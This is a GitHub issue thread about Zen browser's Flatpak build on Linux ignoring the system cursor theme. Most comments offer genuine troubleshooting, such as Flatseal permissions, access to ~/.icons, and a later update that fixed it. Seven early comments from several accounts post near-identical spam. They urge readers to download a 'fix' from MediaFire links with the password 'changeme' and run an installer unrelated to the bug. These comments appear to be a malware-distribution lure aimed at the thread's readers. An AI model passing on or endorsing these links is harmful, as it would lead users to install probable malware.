### ISSUE TITLE
Not respecting system cursor (flatpak) (linux)

### ISSUE THREAD

**Issue by jackjohn7** [zen-browser/desktop#993]
### What happened?

# What happened

I installed the browser (love it) and noticed that zen is not respecting my system's cursor preference. I've included images showing the difference. Not only is it the wrong icon, but it's quite large. It's not just the `default` cursor. The `pointer`, `text`, and other cursors are also incorrect. This issue does not seem to be reproducible with AppImage.

I installed the application using flatpak (through the KDE Discover GUI). I'm running the KDE desktop environment with Wayland. I've not experienced this bug in any other applications.

I expect the cursor to be mostly consistent across applications. This initially made me want to stop using Zen.

I couldn't find anyone else reporting the same problem.

I ordinarily use firefox, and I do not have the same issue there.

# Cursor difference

*right window is Zen, left is KDE Discover*

![image](https://github.com/user-attachments/assets/4270f863-6ab6-470e-9b76-aeb10788a8cd)
![image](https://github.com/user-attachments/assets/2c946e20-7fb9-42c1-865c-6b4470efc897)

## Firefox
![image](https://github.com/user-attachments/assets/d2a6e8ed-600f-4677-8583-72f4d9a1de9e)

# In the meantime

Are there any instructions for building from source? I didn't see any.

### Reproducible?

- [x] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.28

### Severity impact

Low

### What platform are you seeing the problem on?

Linux

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 0Unkn0wn** [comment]
Same here. It looks like the cursor is the [GDK](https://docs.gtk.org/gdk4/ctor.Cursor.new_from_name.html) one and ignores the system's default.


It would be nice to be able to match it with the system one as they are quite different in size as well.

**Comment by CoutHi** [comment]
works fine for me on cinnamon as well, might be a gtk thing I don't know.

**Comment by awwpotato** [comment]
Work fine for me on KDE 6.1.4 Wayland using the a30 Flatpak

**Comment by ethanrusz** [comment]
> Work fine for me on KDE 6.1.4 Wayland using the a30 Flatpak

Working in the same setup for me.

**Comment by fgclue** [comment]
This is a flatpak or Gtk issue I think.

I have the same issue with some applications.

**Comment by jackjohn7** [comment]
I'm having the same issue on the a32 version I downloaded using the flatpakref

**Comment by ravengalqueen** [comment]
I have the Same issue on gnome

**Comment by WasmachenDennSachenSo** [comment]
The package "xdg-desktop-portal-gtk" might fix the issue.

**Comment by Megafrox** [comment]
Giving Zen browser permissions through flatseal fixes this. This is a flatpack issue, not a Zen browser issue.

**Comment by jackjohn7** [comment]
> Giving Zen browser permissions through flatseal fixes this. This is a flatpack issue, not a Zen browser issue.

@Megafrox 

Thanks for letting me know. Do you know what particular permissions are required?

**Comment by jackjohn7** [comment]
> > > Giving Zen browser permissions through flatseal fixes this. This is a flatpack issue, not a Zen browser issue.
> > 
> > 
> > @Megafrox
> > Thanks for letting me know. Do you know what particular permissions are required?
> 
> Not exactly, I just gave it permission to access all files and that worked. I understand if you don't want to do that, tho.

@Megafrox Do you have xdg-desktop-portal-gtk installed? I've tried giving it all the file permissions and I still have the same issue.

**Comment by Megafrox** [comment]
> > > > Giving Zen browser permissions through flatseal fixes this. This is a flatpack issue, not a Zen browser issue.
> > > 
> > > 
> > > @Megafrox
> > > Thanks for letting me know. Do you know what particular permissions are required?
> > 
> > 
> > Not exactly, I just gave it permission to access all files and that worked. I understand if you don't want to do that, tho.
> 
> @Megafrox Do you have xdg-desktop-portal-gtk installed? I've tried giving it all the file permissions and I still have the same issue.

I honestly don't know lmao, if it's pre installed in pop!os then yes, if not, maybe? I can't check cuz Im not at my pc rn.

**Comment by mauro-balades** [comment]
We'll see how this issue persists once I update the flatpak

**Comment by m2x07** [comment]
> The package "xdg-desktop-portal-gtk" might fix the issue.

I am facing the same issue. yes i have `xdg-desktop-portal-gtk` package installed. My desktop:
- Arch Linux
- Gnome 46
- X11
- zen-browser version 1.0.0-a.37 (64-bit) from flatpak

**Comment by m2x07** [comment]
> > Giving Zen browser permissions through flatseal fixes this. This is a flatpack issue, not a Zen browser issue.
> 
> @Megafrox
> 
> Thanks for letting me know. Do you know what particular permissions are required?

These are the two permissions i added through flatseal that solved the issue for me. the `:ro` stands for "read only". Let me know if this helps or not
![image](https://github.com/user-attachments/assets/756e6d24-4546-4ae5-9415-891c10f8589a)

**Comment by jackjohn7** [comment]
This seems to be fixed for me in the latest version. I didn't change anything in flatseal between my last time trying and now.

**Comment by RayZ3R0** [comment]
Seems fixed and was probably a flatpak issue. Closing

**Comment by shynekomaid** [comment]
I had this issue in version 1.10.2b (Firefox 136.0.3) (64-bit) via flatpak but fixed it using Flatseal by adding ~/.icons/ to the allowed files under 'Other files.'

Also you can allow all files, or all user files but in this case Zen will load into a new, clean profile with 'Welcome to the calmer Internet' message.

P.S. Flatpak as a concept is very convenient, but sometimes it's crap, comfortable but crap
